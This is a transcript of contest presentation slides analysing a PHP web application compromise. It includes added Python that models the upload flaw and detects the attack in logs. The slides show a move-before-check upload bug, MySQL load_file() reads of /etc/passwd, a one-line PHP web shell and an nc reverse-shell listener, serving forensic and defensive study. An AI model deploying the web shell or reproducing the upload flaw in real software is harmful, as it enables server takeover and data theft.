
MBSD Cybersecurity Challenges 2018 Final Judging Session Presentation Slides

8ayac
December 12, 2018


Presented as team IPFactory


Transcript

  1. MBSD Cybersecurity Challenges 2018

  2.–9. (no text could be recovered from these slides)
  10. sendmessage.php
    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    // the upload is moved into ./tmp/ first; the file-name check runs only afterwards
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+\.jpg$/", $tname)) {
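The ordering on slide 10 is the whole bug: move_uploaded_file() runs before preg_match(), so a rejected name is already sitting in ./tmp/ by the time the check fails. The following Python is an added illustration, not the deck's or the team's code; it models both orderings against a real scratch directory. IMAGE_NAME mirrors the slide's regex, while the function names, the hardened_save handler and the sample file contents are this example's own assumptions.

```python
import hashlib
import os
import re
import shutil
import tempfile
import time

# Same pattern as the slide's preg_match("/^[^.]+\.jpg$/", $tname)
IMAGE_NAME = re.compile(r"^[^.]+\.jpg$")


def stored_name(original_name: str, user_id: int) -> str:
    """$prefix = md5(time() . $user->id); $tname = $prefix . basename($_FILES[...]["name"])"""
    prefix = hashlib.md5(f"{int(time.time())}{user_id}".encode()).hexdigest()
    return prefix + os.path.basename(original_name)


def vulnerable_save(tmp_path: str, original_name: str, upload_dir: str, user_id: int):
    """Order from the slide: move first, test the name second.

    Returns (accepted, destination). The file is on disk even when accepted is False.
    """
    tname = stored_name(original_name, user_id)
    dest = os.path.join(upload_dir, tname)
    shutil.move(tmp_path, dest)                       # move_uploaded_file(...)
    accepted = IMAGE_NAME.match(tname) is not None    # preg_match(...), evaluated too late
    return accepted, dest


def hardened_save(tmp_path: str, original_name: str, upload_dir: str, user_id: int):
    """Hypothetical fix (this example's own): validate before anything reaches upload_dir."""
    tname = stored_name(original_name, user_id)
    if IMAGE_NAME.match(tname) is None:
        os.remove(tmp_path)                           # discard the temporary upload outright
        return False, None
    dest = os.path.join(upload_dir, tname)
    shutil.move(tmp_path, dest)
    return True, dest


def demo(original_name: str, handler):
    """Run one handler in a throwaway tree.

    Returns (accepted, left_behind): whether the name passed the check and whether a file
    named after the upload remains in the upload directory afterwards.
    """
    with tempfile.TemporaryDirectory() as root:
        upload_dir = os.path.join(root, "tmp")        # the app's ./tmp/
        os.mkdir(upload_dir)
        fd, tmp_path = tempfile.mkstemp(dir=root)     # stand-in for PHP's tmp_name
        with os.fdopen(fd, "wb") as fh:
            fh.write(b"constructed sample body, not an image")
        accepted, _ = handler(tmp_path, original_name, upload_dir, user_id=1)
        suffix = os.path.basename(original_name)
        left_behind = any(n.endswith(suffix) for n in os.listdir(upload_dir))
        return accepted, left_behind


if __name__ == "__main__":
    for name in ("photo.jpg", "test.php"):
        print(name, "vulnerable:", demo(name, vulnerable_save), "hardened:", demo(name, hardened_save))
```

For "test.php" the vulnerable order reports the name as rejected yet leaves the file in the upload directory, which is exactly the state the later slides find; the check-first order rejects it with nothing left on disk.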
  11. sendmessage.php (2018/9/21 14:46:48): MySQL query log
    180921 14:39:24 26247 Connect root@192.168.11.204 on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
  12.–16. Web Shell (2018/9/21 15:12:46), host 192.168.11.2
    uploaded file: 7449f92ea0f26445e89ae968227efaabtest.php
    <?php system($_POST['cmd']);
    Apache error log:
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    Apache access log:
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
  17.–21. (2018/9/21 15:29:02), host 192.168.11.2: listening on 4444/TCP...
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$
    Apache access log:
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
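Slides 11 to 21 reconstruct the incident from three log sources: load_file() reads in the MySQL query log, requests to a .php file under /tmp/ in the Apache access log, and PHP notices from the upload directory in the Apache error log. The following Python is an added example, not the team's or the deck's code; it parses those three formats and merges the hits into one timeline. The embedded log lines are taken from the slides above (a subset of the MySQL lines), while the upload-directory paths (/tmp/ under the web root, /var/www/html/webmix3/tmp/ on disk) are read off slides 10 and 14, and the Finding type and function names are this example's own.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Log lines as shown on slides 11, 14 and 16/21 (MySQL lines shortened to a subset).
MYSQL_GENERAL_LOG = """\
180921 14:39:24 26247 Connect root@192.168.11.204 on mysql
180921 14:41:06 26247 Query select load_file('/etc/hosts')
180921 14:41:12 26247 Query select load_file('/etc/passwd')
180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
"""
APACHE_ACCESS_LOG = """\
192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
"""
APACHE_ERROR_LOG = """\
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
"""

MYSQL_RE = re.compile(r"^(\d{6}) +(\d{1,2}:\d{2}:\d{2}) +(\d+) +(\w+)\s*(.*)$")
LOAD_FILE_RE = re.compile(r"load_file\(\s*'([^']*)'\s*\)", re.I)
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
ERROR_RE = re.compile(r"^\[([^\]]+)\] \[error\] \[client (\S+)\] (.*)$")
UPLOADED_SCRIPT_RE = re.compile(r"^/tmp/[^/?]+\.php(?:\?.*)?$", re.I)  # web path of the upload dir
UPLOAD_DIR_ON_DISK = "/var/www/html/webmix3/tmp/"                        # same directory on disk


@dataclass
class Finding:
    when: datetime
    source: str   # "mysql", "access" or "error"
    client: str
    detail: str


def scan_mysql(text: str) -> list:
    """Flag load_file() reads; attribute each to the user@host seen on the thread's Connect line."""
    clients, out = {}, []
    for line in text.splitlines():
        m = MYSQL_RE.match(line)
        if not m:
            continue
        date, clock, tid, cmd, args = m.groups()
        if cmd == "Connect":
            clients[tid] = args.split(" on ")[0]      # e.g. root@192.168.11.204
            continue
        lf = LOAD_FILE_RE.search(args) if cmd == "Query" else None
        if lf:
            when = datetime.strptime(f"{date} {clock}", "%y%m%d %H:%M:%S")
            out.append(Finding(when, "mysql", clients.get(tid, f"thread {tid}"),
                               f"load_file() read of {lf.group(1)}"))
    return out


def scan_access(text: str) -> list:
    """Flag any request that executes a .php file inside the upload directory."""
    out = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m or not UPLOADED_SCRIPT_RE.match(m.group(4)):
            continue
        client, ts, method, path, status, _ = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        what = "command input posted to" if method == "POST" else "request for"
        out.append(Finding(when, "access", client, f"{what} PHP in upload dir: {method} {path} -> {status}"))
    return out


def scan_error(text: str) -> list:
    """Flag PHP diagnostics whose script lives in the upload directory."""
    out = []
    for line in text.splitlines():
        m = ERROR_RE.match(line)
        if not m or UPLOAD_DIR_ON_DISK not in m.group(3):
            continue
        ts, client, msg = m.groups()
        when = datetime.strptime(ts, "%a %b %d %H:%M:%S %Y")
        out.append(Finding(when, "error", client, "PHP ran from upload dir: " + msg.split(" in ")[0]))
    return out


def analyze(mysql_log: str, access_log: str, error_log: str) -> list:
    """Merge all findings into one chronologically sorted timeline (stable sort keeps source order on ties)."""
    findings = scan_mysql(mysql_log) + scan_access(access_log) + scan_error(error_log)
    return sorted(findings, key=lambda f: f.when)


if __name__ == "__main__":
    for f in analyze(MYSQL_GENERAL_LOG, APACHE_ACCESS_LOG, APACHE_ERROR_LOG):
        print(f.when, f.source.ljust(6), f.client, f.detail)
```

Run as is, the timeline starts with the source-code reads through load_file() from root@192.168.11.204 and ends with the POST to the uploaded .php at 15:29:02, the same second the nc listener logged its connection. The MySQL rule keys on the function name because this scan covers a general query log; on a production server, restricting FILE privilege and secure_file_priv removes the capability rather than just detecting it.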
  22.–35. (no text could be recovered from these slides)